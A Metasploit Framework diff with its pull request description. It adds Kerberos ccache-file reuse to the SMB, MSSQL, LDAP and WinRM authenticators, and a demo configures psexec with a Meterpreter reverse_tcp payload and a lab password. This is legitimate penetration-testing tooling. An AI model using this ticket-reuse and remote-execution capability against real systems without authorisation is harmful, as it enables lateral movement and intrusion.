-          server_sequence_number: decrypted.sequence_number
-        }
-      when TOK_ID_KRB_ERROR
-        krb_err = Rex::Proto::Kerberos::Model::KrbError.decode(data)
-        print_error("#{peer} - Received KRB-ERR.")
-
-        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(res: krb_err)
-      else
-        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, "Unknown token id: #{tok_id.inspect}"
-      end
-    else
-      raise ::NotImplementedError, "Parsing mechtype #{mech_id.value} not supported"
-    end
-
-  end
-
-  def build_gss_ap_req_checksum_value(mutual_auth, ticket, decrypted_part, session_key, realm, client_name)
-    # No channel binding
-    channel_binding_info = "\x00" * 16
-    channel_binding_info_len = [channel_binding_info.length].pack('V')
-
-    flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
-    flags |= GSS_MUTUAL if mutual_auth
-    flags |= GSS_DELEGATE if ticket
-
-    flags = [flags].pack('V')
-
-    checksum_val = channel_binding_info_len + channel_binding_info + flags
-
-    if ticket
-      krb_cred = Rex::Proto::Kerberos::Model::KrbCred.new
-      krb_cred.pvno = 5
-      krb_cred.msg_type = 0x16
-      krb_cred.tickets = [ticket]
-      ticket_info = Rex::Proto::Kerberos::Model::KrbCredInfo.new
-      ticket_info.key = decrypted_part.key
-      ticket_info.prealm = realm
-      ticket_info.pname = build_client_name(client_name: client_name)
-      ticket_info.flags = decrypted_part.flags
-      ticket_info.auth_time = decrypted_part.auth_time
-      ticket_info.start_time = decrypted_part.start_time
-      ticket_info.end_time = decrypted_part.end_time
-      ticket_info.renew_till = decrypted_part.renew_till
-      ticket_info.sname = decrypted_part.sname
-      ticket_info.srealm = decrypted_part.srealm
-
-      enc_part = Rex::Proto::Kerberos::Model::EncKrbCredPart.new
-      enc_part.ticket_info = [ticket_info]
-
-      krb_cred.enc_part = enc_part.encrypt(session_key)
-
-      dlg_opt = [1].pack('v')
-      dlg_val = krb_cred.encode
-      dlg_length = [dlg_val.length].pack('v')
-      checksum_val += dlg_opt + dlg_length + dlg_val
-    end
-
-    checksum = Rex::Proto::Kerberos::Model::Checksum.new(
-      type: Rex::Proto::Gss::KRB_AP_REQ_CHKSUM_TYPE,
-      checksum: checksum_val)
   end
 
   # Search the database for a credential object that can be used for authentication.
@@ -655,6 +623,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
       return credential
     end
+
+    nil
   end
 
   # Build a loot info string that can later be used in a lookup.
@@ -665,7 +635,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     info = []
 
     info << "realm: #{self.realm.upcase}" if self.realm
-    info << "serviceName: #{options[:sname].name_string.join('/').downcase}" if options[:sname]
+    info << "serviceName: #{options[:sname].to_s.downcase}" if options[:sname]
     info << "username: #{self.username.downcase}" if self.username
 
     info.join(', ')

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -108,9 +108,16 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @mutual_auth = mutual_auth
     @use_gss_checksum = use_gss_checksum
     @mechanism = mechanism
-    @send_delegated_creds = send_delegated_creds
-    # the cache file is only use for loading credentials, it is *not* written to
-    @credential = cache_file ? load_credential_from_file(cache_file) : nil
+
+    credential = nil
+    if cache_file
+      # the cache file is only used for loading credentials, it is *not* written to
+      credential = load_credential_from_file(cache_file)
+      if credential.nil?
+        vprint_error("Failed to load a credential from ticket file: #{cache_file}")
+      end
+    end
+    @credential = credential
   end
 
   # Returns the target host
@@ -129,6 +136,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
   # @param [Hash] options
   # @option options [String] :credential An explicit credential object to use for authentication.
+  # @option options [Rex::Proto::Kerberos::Model::PrincipalName] :sname The target service principal name.
+  # @option options [String] :mechanism The authentication mechanism. One of the Rex::Proto::Gss::Mechanism constants.
   # @return [Hash] The security_blob SPNEGO GSS and TGS session key
   def authenticate(options = {})
     options[:sname] = options.fetch(:sname) { build_spn(options) }
@@ -621,27 +630,27 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
       unless tkt_start < now
         wlog("Filtered credential #{file_path} ##{index} reason: Ticket start time is before now (start: #{tkt_start})")
-        return false
+        next
       end
 
       unless now < tkt_end
         wlog("Filtered credential #{file_path} ##{index} reason: Ticket is expired (expiration: #{tkt_end})")
-        return false
+        next
       end
 
       unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
         wlog("Filtered credential #{file_path} ##{index} reason: Realm does not match (realm: #{credential.server.realm})")
-        return false
+        next
       end
 
       unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
         wlog("Filtered credential #{file_path} ##{index} reason: SPN does not match (spn: #{credential.server.components.snapshot.join('/')})")
-        return false
+        next
       end
 
       unless !@username || @username.casecmp?(credential.client.components.last.to_s)
         wlog("Filtered credential #{file_path} ##{index} reason: username does not match (username: #{credential.client.components.last})")
-        return false
+        next
       end
 
       return credential

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/http.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/http.rb
@@ -4,19 +4,13 @@
 # This class acts as standalone authenticator for Kerberos
 #
 class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP < Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
-  # @param [Hash] options
-  # @return [String] SPNEGO GSS Blob
-  def authenticate(options = {})
-    sname = options.fetch(:sname) do
-      Rex::Proto::Kerberos::Model::PrincipalName.new(
-        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
-        name_string: [
-          "http",
-          options.fetch(:hostname) { hostname }
-        ]
-      )
-    end
-
-    super(options.merge({ sname: sname }))
+  def build_spn(options = {})
+    Rex::Proto::Kerberos::Model::PrincipalName.new(
+      name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+      name_string: [
+        "http",
+        options.fetch(:hostname) { hostname }
+      ]
+    )
   end
 end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/ldap.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/ldap.rb
@@ -4,19 +4,13 @@
 # This class acts as standalone authenticator for Kerberos
 #
 class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP < Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
-  # @param [Hash] options
-  # @return [String] SPNEGO GSS Blob
-  def authenticate(options = {})
-    sname = options.fetch(:sname) do
-      Rex::Proto::Kerberos::Model::PrincipalName.new(
-        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
-        name_string: [
-          "ldap",
-          options.fetch(:hostname) { hostname }
-        ]
-      )
-    end
-
-    super(options.merge({ sname: sname }))
+  def build_spn(options = {})
+    Rex::Proto::Kerberos::Model::PrincipalName.new(
+      name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+      name_string: [
+        "ldap",
+        options.fetch(:hostname) { hostname }
+      ]
+    )
   end
 end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/mssql.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/mssql.rb
@@ -16,19 +16,13 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL < Msf::Exploit
     super(**kwargs)
   end
 
-  # @param [Hash] options
-  # @return [Hash] The security_blob SPNEGO GSS and TGS session key
-  def authenticate(options = {})
-    sname = options.fetch(:sname) do
-      Rex::Proto::Kerberos::Model::PrincipalName.new(
-        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
-        name_string: [
-          'MSSQLSvc',
-          "#{options.fetch(:hostname) { hostname }}:#{options.fetch(:mssql_port, mssql_port)}"
-        ]
-      )
-    end
-
-    super(options.merge({ sname: sname }))
+  def build_spn(options = {})
+    Rex::Proto::Kerberos::Model::PrincipalName.new(
+      name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+      name_string: [
+        'MSSQLSvc',
+        "#{options.fetch(:hostname) { hostname }}:#{options.fetch(:mssql_port, mssql_port)}"
+      ]
+    )
   end
 end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/smb.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/smb.rb
@@ -4,19 +4,13 @@
 # This class acts as standalone authenticator for Kerberos
 #
 class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB < Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
-  # @param [Hash] options
-  # @return [Hash] The security_blob SPNEGO GSS and TGS session key
-  def authenticate(options = {})
-    sname = options.fetch(:sname) do
-      Rex::Proto::Kerberos::Model::PrincipalName.new(
-        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
-        name_string: [
-          "cifs",
-          options.fetch(:hostname) { hostname }
-        ]
-      )
-    end
-
-    super(options.merge({ sname: sname }))
+  def build_spn(options = {})
+    Rex::Proto::Kerberos::Model::PrincipalName.new(
+      name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+      name_string: [
+        "cifs",
+        options.fetch(:hostname) { hostname }
+      ]
+    )
   end
 end

--- a/lib/msf/core/exploit/remote/ldap.rb
+++ b/lib/msf/core/exploit/remote/ldap.rb
@@ -61,6 +61,7 @@ module Msf
       when Msf::Exploit::Remote::AuthOption::KERBEROS
         fail_with(Msf::Exploit::Failure::BadConfig, 'The LdapRhostname option is required when using Kerberos authentication.') if datastore['LdapRhostname'].blank?
         fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
+        fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
 
         kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
           host: datastore['DomainControllerRhost'],

--- a/lib/msf/core/exploit/remote/ldap.rb
+++ b/lib/msf/core/exploit/remote/ldap.rb
@@ -23,6 +23,7 @@ module Msf
       register_advanced_options([
         OptEnum.new('LDAPAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
         OptString.new('LdapRhostname', [false, 'The rhostname which is required for kerberos']),
+        OptPath.new('LdapKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('LDAPKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ LDAPAuth == kerberos ]),
         OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
         OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
       ])
@@ -58,7 +59,8 @@ module Msf
 
       case datastore['LDAPAuth']
       when Msf::Exploit::Remote::AuthOption::KERBEROS
-        fail_with(Msf::Exploit::Failure::BadConfig, 'The LdapRhostname option is required when using kerberos authentication.') if datastore['LdapRhostname'].blank?
+        fail_with(Msf::Exploit::Failure::BadConfig, 'The LdapRhostname option is required when using Kerberos authentication.') if datastore['LdapRhostname'].blank?
+        fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
 
         kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
           host: datastore['DomainControllerRhost'],
@@ -67,7 +69,8 @@ module Msf
           username: datastore['USERNAME'],
           password: datastore['PASSWORD'],
           framework: framework,
-          framework_module: self
+          framework_module: self,
+          cache_file: datastore['LdapKrb5Ccname'].blank? ? nil : datastore['LdapKrb5Ccname']
         )
 
         kerberos_result = kerberos_authenticator.authenticate

--- a/lib/msf/core/exploit/remote/mssql.rb
+++ b/lib/msf/core/exploit/remote/mssql.rb
@@ -414,7 +414,8 @@ module Exploit::Remote::MSSQL
       sname = Rex::Text.to_unicode( rhost )
 
       fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlRhostname option is required when using Kerberos authentication.') if datastore['MssqlRhostname'].blank?
-      fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlDomain option is required when using Kerberos authentication.') if datastore['MssqlDomain'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
 
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
         host: datastore['DomainControllerRhost'],

--- a/lib/msf/core/exploit/remote/mssql.rb
+++ b/lib/msf/core/exploit/remote/mssql.rb
@@ -63,6 +63,7 @@ module Exploit::Remote::MSSQL
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'], aliases: ['MssqlDomain']),
         OptEnum.new('MssqlAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS]),
         OptString.new('MssqlRhostname', [false, 'The mssql hostname, required for kerberos']),
+        OptPath.new('MssqlKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('MSSQLKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ MssqlAuth == kerberos ]),
         OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'])
       ], Msf::Exploit::Remote::MSSQL)
     register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
@@ -412,7 +413,9 @@ module Exploit::Remote::MSSQL
       aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
       sname = Rex::Text.to_unicode( rhost )
 
-      fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlRhostname option is required when using kerberos authentication.') if datastore['MssqlRhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlRhostname option is required when using Kerberos authentication.') if datastore['MssqlRhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlDomain option is required when using Kerberos authentication.') if datastore['MssqlDomain'].blank?
+
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['MssqlRhostname'],
@@ -421,7 +424,8 @@ module Exploit::Remote::MSSQL
         username: datastore['username'],
         password: datastore['password'],
         framework: framework,
-        framework_module: self
+        framework_module: self,
+        cache_file: datastore['MssqlKrb5Ccname'].blank? ? nil : datastore['MssqlKrb5Ccname']
       )
 
       kerberos_result = kerberos_authenticator.authenticate

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -153,6 +153,7 @@ module Msf
         if datastore['SMBAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
           fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using Kerberos authentication.') if datastore['SmbRhostname'].blank?
           fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
+          fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
 
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
             host: datastore['DomainControllerRhost'],

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -151,7 +151,8 @@ module Msf
       def smb_login(simple_client = self.simple)
         # Override the default RubySMB capabilities with Kerberos authentication
         if datastore['SMBAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
-          fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using kerberos authentication.') if datastore['SmbRhostname'].blank?
+          fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using Kerberos authentication.') if datastore['SmbRhostname'].blank?
+          fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
 
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
             host: datastore['DomainControllerRhost'],
@@ -160,7 +161,8 @@ module Msf
             username: datastore['SMBUser'],
             password: datastore['SMBPass'],
             framework: framework,
-            framework_module: self
+            framework_module: self,
+            cache_file: datastore['SmbKrb5Ccname'].blank? ? nil : datastore['SmbKrb5Ccname']
           )
 
           simple_client.client.extend(Msf::Exploit::Remote::SMB::Client::KerberosAuthentication)

--- a/lib/msf/core/exploit/remote/smb/client/authenticated.rb
+++ b/lib/msf/core/exploit/remote/smb/client/authenticated.rb
@@ -21,7 +21,8 @@ module Exploit::Remote::SMB::Client::Authenticated
       [
         OptEnum.new('SMBAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::SMB_OPTIONS]),
         OptString.new('SmbRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'])
+        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
+        OptPath.new('SmbKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('SMBKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ SMBAuth == kerberos ])
       ],
       Msf::Exploit::Remote::SMB::Client::Authenticated
     )

--- a/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
@@ -39,7 +39,7 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
 
     kerberos_result = @kerberos_authenticator.authenticate
 
-    @application_key = @session_key = kerberos_result[:session_key].value[0..16]
+    @application_key = @session_key = kerberos_result[:session_key].value[0...16]
 
     raw_kerberos_response = smb1_kerberos_authenticate(kerberos_result[:security_blob])
     response = smb1_session_setup_response(raw_kerberos_response)
@@ -98,7 +98,7 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
     @kerberos_authenticator.validate_response!(response.buffer)
 
     @session_id = response.smb2_header.session_id
-    @application_key = @session_key = kerberos_result[:session_key].value[0..16]
+    @application_key = @session_key = kerberos_result[:session_key].value[0...16]
 
     @session_is_guest = response.session_flags.guest == 1
 

--- a/lib/msf/core/exploit/remote/winrm.rb
+++ b/lib/msf/core/exploit/remote/winrm.rb
@@ -19,7 +19,7 @@ module Exploit::Remote::WinRM
     register_options(
       [
         Opt::RPORT(5985),
-        OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
+        OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKSTATION']),
         OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
         OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
         OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]),

--- a/lib/rex/proto/kerberos/credential_cache/krb5_ccache_principal.rb
+++ b/lib/rex/proto/kerberos/credential_cache/krb5_ccache_principal.rb
@@ -13,5 +13,9 @@ module Rex::Proto::Kerberos::CredentialCache
     uint32        :count_of_components, initial_value: -> { components.length }
     data          :realm
     array         :components, initial_length: :count_of_components, type: :data
+
+    def to_s
+      components.snapshot.join('/')
+    end
   end
 end

--- a/lib/rex/proto/kerberos/model/krb_cred_info.rb
+++ b/lib/rex/proto/kerberos/model/krb_cred_info.rb
@@ -116,7 +116,7 @@ module Rex
           #
           # @return [OpenSSL::ASN1::GeneralizedTime]
           def encode_renew_till
-            OpenSSL::ASN1::GeneralizedTime.new(renew_till)
+            OpenSSL::ASN1::GeneralizedTime.new(renew_till.nil? ? 0 : renew_till)
           end
 
           # Encodes the srealm field

--- a/lib/rex/proto/kerberos/model/principal_name.rb
+++ b/lib/rex/proto/kerberos/model/principal_name.rb
@@ -45,6 +45,10 @@ module Rex
             seq.to_der
           end
 
+          def to_s
+            name_string.join('/')
+          end
+
           private
 
           # Encodes the name_type

--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -24,8 +24,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('CMD', [ true, 'The windows command to run', 'ipconfig /all' ]),
-        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
-        OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
+        OptString.new('USERNAME', [ true, 'The username to authenticate as'])
       ]
     )
 
@@ -41,7 +40,11 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     if datastore['WinrmAuth'] == KERBEROS
-      fail_with(Msf::Exploit::Failure::BadConfig, 'The WinrmRhostname option is required when using kerberos authentication.') if datastore['WinrmRhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The WinrmRhostname option is required when using Kerberos authentication.') if datastore['WinrmRhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
+    else
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The PASSWORD option is required unless using Kerberos authentication.') if datastore['PASSWORD'].blank?
     end
     super
   end

--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
       [
         OptEnum.new('WinrmAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::WINRM_OPTIONS]),
         OptString.new('WinrmRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'])
+        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
+        OptPath.new('WinrmKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('WINRMKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ WinrmAuth == kerberos ])
       ]
     )
   end
@@ -76,6 +77,7 @@ class MetasploitModule < Msf::Auxiliary
         timeout: 20, # datastore['timeout']
         framework: framework,
         framework_module: self,
+        cache_file: datastore['WinrmKrb5Ccname'].blank? ? nil : datastore['WinrmKrb5Ccname'],
         mutual_auth: true,
         use_gss_checksum: true
       )

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Auxiliary
       [
         OptEnum.new('WinrmAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::WINRM_OPTIONS]),
         OptString.new('WinrmRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'])
+        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
+        OptPath.new('WinrmKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('WINRMKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ WinrmAuth == kerberos ])
       ]
     )
   end
@@ -72,6 +73,7 @@ class MetasploitModule < Msf::Auxiliary
           timeout: 20,
           framework: framework,
           framework_module: self,
+          cache_file: datastore['WinrmKrb5Ccname'].blank? ? nil : datastore['WinrmKrb5Ccname'],
           mutual_auth: true,
           use_gss_checksum: true
         )


### PR DESCRIPTION
This PR enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication.

In order of preference a Krb5CacheCredential object is obtained and used from:

1. An explicit credential is passed as a keyword argument to `#authenticate`
2. A cache_file is passed to `#initialize` (if a credential can not be read from the file for whatever reason (e.g. the file doesn't exist, it's not readable, it's malformed) it will be ignored)
3. The database is searched for a previously stored credential object based on the SPN, username, timestamp, etc.
4. A new TGS credential object obtained from the KDC (and stored for later use)

Scenarios 1-3 are all newly added in this PR, whereas before only the last was an option.

~~WinRM hasn't been updated with the `WinrmKrb5Ccname` option yet because the only two modules that use it are scanners. I don't think updating scanners with this option makes sense because it would only work for a single target. If we wanted WinRM support for explicit CCACHE files, either a new module for one host should be added or the `#load_credential_from_file` method should be updated not to throw an exception when there are no usable credentials. Not throwing an exception when the user specifies an explicit file to use for authentication might lead to confusion when it's silently ignored and a new TGS is requested using the rest of the configuration options which may not match (like the username for example). I'm not sure which option is better.~~

Updated WinRM to include the `WinrmKrb5Ccname` option for loading specific files. Because the cache file is ignored if nothing is loaded from it, there shouldn't be major issues when scanning multiple hosts with WinRM.

## Verification

- [ ] Start `msfconsole` with an active database connection
- [ ] `use exploit/windows/smb/psexec` as an SMB example
  - [ ] Set all of the necessary options but leave SmbKrb5Ccname blank (the default)
  - [ ] Run the module and see that a new TGS is saved (save this ticket file to another path for later)
  - [ ] Run the module again, see that no TGS is saved but the module still works because the previously cached value is used
  - [ ] Run `workspace -D`
  - [ ] Run the module gain, see that a new TGS is saved again because the cache was cleared by deleting the workspace
  - [ ] Run `workspace -D` again
  - [ ] Set `SmbKrb5Ccname` to the previously saved ticket path and run the module again, see that it worked and that no new TGS is saved
- [ ] Run through the same steps for WinRM which is a bit of a special case given that it uses KERBEROS instead of SPNEGO and mutual authentication
  - [ ] Set all of the necessary options but leave WinrmKrb5Ccname blank (the default)
  - [ ] Run the module and see that a new TGS is saved (save this ticket file to another path for later)
  - [ ] Run the module again, see that no TGS is saved but the module still works because the previously cached value is used
  - [ ] Run `workspace -D`
  - [ ] Run the module gain, see that a new TGS is saved again because the cache was cleared by deleting the workspace
  - [ ] Run `workspace -D` again
  - [ ] Set `WinrmKrb5Ccname` to the previously saved ticket path and run the module again, see that it worked and that no new TGS is saved

<details>
<summary>Demo</summary>

```
msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.10   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             msflab.local     no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > show advanced 

Module advanced options (exploit/windows/smb/psexec):

   Name                                    Current Setting                                         Required  Description
   ----                                    ---------------                                         --------  -----------
   ALLOW_GUEST                             false                                                   yes       Keep trying if only given guest access
   CHOST                                                                                           no        The local client address
   CMD::DELAY                              3                                                       no        A delay (in seconds) before reading the command output and cleaning up
   CPORT                                                                                           no        The local client port
   ConnectTimeout                          10                                                      yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                                                          no        The information file that contains context information
   DCERPC::ReadTimeout                     10                                                      yes       The number of seconds to wait for DCERPC responses
   DisablePayloadHandler                   false                                                   no        Disable the handler code for the selected payload
   DomainControllerRhost                   192.168.159.10                                          no        The resolvable rhost for the Domain Controller
   EXE::Custom                                                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR                              false                                                   no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack                           false                                                   no        Use the default template in case the specified one is missing
   EXE::Inject                             false                                                   no        Set to preserve the original EXE function
   EXE::OldMethod                          false                                                   no        Set to use the substitution EXE generation method.
   EXE::Path                                                                                       no        The directory in which to look for the executable template
   EXE::Template                                                                                   no        The executable template file name.
   EnableContextEncoding                   false                                                   no        Use transient context when encoding payloads
   MSI::Custom                                                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR                              false                                                   no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                                       no        The directory in which to look for the msi template
   MSI::Template                                                                                   no        The msi template file name
   MSI::UAC                                false                                                   no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   NTLM::SendLM                            true                                                    yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM                          true                                                    yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN                           true                                                    yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is require
                                                                                                             d
   NTLM::UseLMKey                          false                                                   yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session                  true                                                    yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2                         true                                                    yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
